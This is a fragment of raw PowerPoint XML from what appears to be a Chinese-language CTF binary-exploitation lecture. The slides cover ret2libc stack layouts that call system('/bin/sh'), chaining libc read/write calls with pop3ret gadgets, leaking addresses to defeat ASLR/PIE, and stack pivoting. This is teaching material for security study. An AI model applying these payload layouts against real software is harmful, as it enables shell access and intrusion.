          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="3609433"/>
            <a:ext cx="1183600" cy="4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Overflow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496" name="Shape 1496"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="2027400"/>
            <a:ext cx="2496800" cy="9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" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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497" name="Shape 1497"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="3819267"/>
            <a:ext cx="2882800" cy="25044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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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system:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...(execute command)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1498" name="Shape 1498"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="5240535"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1499" name="Shape 1499"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1867" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1867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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1500" name="Shape 1500"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="69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sp>
        <p:nvSpPr>
          <p:cNvPr id="1501" name="Shape 1501"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="1763367"/>
            <a:ext cx="2882800" cy="18292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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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stack overflow:</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867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502" name="Shape 1502"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018800" y="2496467"/>
            <a:ext cx="1501600" cy="4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FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>argument 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1503" name="Shape 1503"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="2700467"/>
            <a:ext cx="5376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2" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E734AB-BC17-4D89-93C2-FEE1F58FA77B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc</a:t>
            </a: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9" name="Shape 1509"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2494067"/>
            <a:ext cx="2095200" cy="4096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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr sz="1867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510" name="Shape 1510"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2903667"/>
            <a:ext cx="2095200" cy="4096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exit</a:t>
            </a:r>
            <a:endParaRPr sz="1867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511" name="Shape 1511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="3313267"/>
            <a:ext cx="2095200" cy="4096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system</a:t>
            </a:r>
            <a:endParaRPr sz="1867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512" name="Shape 1512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="3722867"/>
            <a:ext cx="2095200" cy="4096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padding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513" name="Shape 1513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="4132467"/>
            <a:ext cx="2095200" cy="16268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padding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514" name="Shape 1514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2084467"/>
            <a:ext cx="2095200" cy="4096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0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515" name="Shape 1515"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="2705267"/>
            <a:ext cx="848800" cy="4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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1516" name="Shape 1516"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="2910067"/>
            <a:ext cx="5376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17" name="Shape 1517"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9471400" y="2109200"/>
            <a:ext cx="21200" cy="36412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518" name="Shape 1518"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="3609433"/>
            <a:ext cx="1183600" cy="4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Overflow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519" name="Shape 1519"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="2027400"/>
            <a:ext cx="2496800" cy="9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system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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1520" name="Shape 1520"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="2192535"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1521" name="Shape 1521"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1867" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1867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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1522" name="Shape 1522"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="69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sp>
        <p:nvSpPr>
          <p:cNvPr id="1523" name="Shape 1523"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="1763367"/>
            <a:ext cx="2882800" cy="18292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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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exit:</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867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524" name="Shape 1524"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="3819267"/>
            <a:ext cx="2882800" cy="25044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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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system:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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...(execute command)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1525" name="Shape 1525"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="2294067"/>
            <a:ext cx="5376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526" name="Shape 1526"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018800" y="2090067"/>
            <a:ext cx="1501600" cy="4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FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>argument 1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial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3C986233-B83D-40B0-83BF-B05575D8FBB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc</a:t>
            </a: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9" name="Shape 1709"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="730250"/>
            <a:ext cx="4579938" cy="763588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altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>连续调用多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1710" name="Shape 1710"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383600" y="4493567"/>
            <a:ext cx="6415600" cy="6084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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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read(int fd, char *buf, int len);</a:t>
            </a:r>
            <a:endParaRPr sz="1867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711" name="Shape 1711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="2234767"/>
            <a:ext cx="2095200" cy="4096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char *buf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712" name="Shape 1712"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="2644367"/>
            <a:ext cx="2095200" cy="4096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int fd=1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713" name="Shape 1713"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="1825167"/>
            <a:ext cx="2095200" cy="4096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int len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714" name="Shape 1714"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="3053967"/>
            <a:ext cx="2095200" cy="4096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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>pop3ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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715" name="Shape 1715"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="3463567"/>
            <a:ext cx="2095200" cy="4096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write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716" name="Shape 1716"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="3873167"/>
            <a:ext cx="2095200" cy="4096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int len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717" name="Shape 1717"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="4282767"/>
            <a:ext cx="2095200" cy="4096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char *buf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718" name="Shape 1718"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="4692367"/>
            <a:ext cx="2095200" cy="4096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int fd=0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719" name="Shape 1719"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="5101967"/>
            <a:ext cx="2095200" cy="4096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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>pop3ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FF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720" name="Shape 1720"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604900" y="5511567"/>
            <a:ext cx="2095200" cy="4096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read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721" name="Shape 1721"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383600" y="2544967"/>
            <a:ext cx="6415600" cy="6084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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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write(char *path, char *argv[], char *envp[]);</a:t>
            </a:r>
            <a:endParaRPr sz="1867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1722" name="Shape 1722"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1710" idx="0"/>
            <a:endCxn id="1721" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3591400" y="3153567"/>
            <a:ext cx="0" cy="1340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723" name="Shape 1723"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7015451" y="2143100"/>
            <a:ext cx="373200" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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724" name="Shape 1724"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7015433" y="4129767"/>
            <a:ext cx="373200" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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725" name="Shape 1725"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10384400" y="3525767"/>
            <a:ext cx="1424000" cy="13964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pop esi </a:t>
            </a:r>
            <a:endParaRPr sz="1867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pop edi</a:t>
            </a:r>
            <a:endParaRPr sz="1867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pop ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867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ret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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1726" name="Shape 1726"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1714" idx="3"/>
            <a:endCxn id="1725" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9700100" y="3258767"/>
            <a:ext cx="684400" cy="9652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727" name="Shape 1727"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1719" idx="3"/>
            <a:endCxn id="1725" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="9700100" y="4223967"/>
            <a:ext cx="684400" cy="10828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3" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832C4A67-68CA-4C55-919D-BA2710179887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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3792751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DA4D1F7-4598-4FB7-8B43-6CCB192628D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2347174" y="2725805"/>
            <a:ext cx="74976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到目前为止我们只接触了内存空间分布已知的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，但在绝大部分赛题中，由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保护的开启，在发送攻击载荷（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）之前，往往需要我们先泄露内存分布信息，接下来来看一道题目。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411DE94-44FB-4AE6-AFAF-CD37A028E972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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其它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ROP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技巧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8025714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2" name="Shape 1732"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="869950"/>
            <a:ext cx="1419225" cy="585788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zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>栈迁移</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1733" name="Shape 1733"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1536700"/>
            <a:ext cx="11360150" cy="5100638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dirty="0"/>
              <a:t>Definition</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457189">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>改变 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
